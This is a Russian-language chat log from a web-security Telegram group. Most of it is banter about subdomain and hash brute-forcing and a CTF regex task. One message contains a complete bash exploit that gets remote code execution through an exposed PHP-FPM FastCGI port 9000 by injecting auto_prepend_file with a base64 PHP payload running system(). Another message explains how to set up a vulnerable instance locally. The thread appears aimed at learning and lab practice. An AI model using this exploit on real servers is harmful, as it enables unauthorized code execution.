Size: a a a

2020 November 09

S

Slava in WebPwnChat
Алексей
Брут для плохих людей, фи
Домены брутить тоже фу? 🌚
источник

A

Aba in WebPwnChat
Lord Voldemort
да вот и я смотрю регулярка кривая походу.
Ага. Если верить regex101.com то походу не отработает регулярка, но лучше бы чекнуть на пыхе самому.
источник

А

Алексей in WebPwnChat
Slava
Домены брутить тоже фу? 🌚
Ну смотря с каким рейтом брутить, поддомены это святое
источник

WS

Web Security in WebPwnChat
Slava
Покупать белый хост для додоза непохек. Надо арбузостойкие смотреть
Я не для дудоса, а для брута сабдоменов, Окуня и иной автоматизации
источник

L

Lord Voldemort in WebPwnChat
Aba
Ага. Если верить regex101.com то походу не отработает регулярка, но лучше бы чекнуть на пыхе самому.
Ну ошибок не выдает, на 7.4 тестил
источник

А

Алексей in WebPwnChat
Austin Augie
А бруто-сервера для брутания хэшей?
На него жалоба не прилетит
источник

S

Slava in WebPwnChat
Web Security
Я не для дудоса, а для брута сабдоменов, Окуня и иной автоматизации
Тогда норм
источник

AA

Austin Augie in WebPwnChat
Алексей
На него жалоба не прилетит
Потому что он личный!
источник

А

Алексей in WebPwnChat
Austin Augie
Потому что он личный!
Когда купил себе 2 3080 в слай только для брутания хешей
источник

AA

Austin Augie in WebPwnChat
Алексей
Когда купил себе 2 3080 в слай только для брутания хешей
На теслах 👍🏻
источник

AK

Anton Kirsanov 🐸 in WebPwnChat
Алексей
Когда купил себе 2 3080 в слай только для брутания хешей
sli не нужен для хешей
источник

БК

Бздиловатый Конёк... in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
   OUTPUT=$(mktemp)
   env -i \
     PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
     SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
     cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

   cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
Ребятишки, можете поделиться ссылкой на уязвимый к этой атаке FastCGI? Чтобы развернуть у себя.
источник

AT

Alexander Twost in WebPwnChat
Aba
\\\\\\/

Чет тут с слешами толи перебор, толи недобор
Там не в слешах суть)
Регулярка рабочая
источник

AK

Anton Kirsanov 🐸 in WebPwnChat
Бздиловатый Конёк
Ребятишки, можете поделиться ссылкой на уязвимый к этой атаке FastCGI? Чтобы развернуть у себя.
любой, только по дефолту listen с юникс сокета вроде /run/php/php7.3-fpm.sock на 127.0.0.1:9000 поменяй
источник

БК

Бздиловатый Конёк... in WebPwnChat
Anton Kirsanov 🐸
любой, только по дефолту listen с юникс сокета вроде /run/php/php7.3-fpm.sock на 127.0.0.1:9000 поменяй
спс
источник

b

b4tr in WebPwnChat
Alexander Twost
Там не в слешах суть)
Регулярка рабочая
ты то 100% знаешь решение )) это твой таск ))
источник

AT

Alexander Twost in WebPwnChat
b4tr
ты то 100% знаешь решение )) это твой таск ))
Я тоже выиграл?
источник

AT

Alexander Twost in WebPwnChat
☺️
источник

b

b4tr in WebPwnChat
Alexander Twost
Я тоже выиграл?
тебе и так дам доступ ) без всяких тасков ) скинь только свой id
источник

AT

Alexander Twost in WebPwnChat
b4tr
тебе и так дам доступ ) без всяких тасков ) скинь только свой id
Да я шучу, мне нет пока нужды, если что напишу)
Спасибо)
источник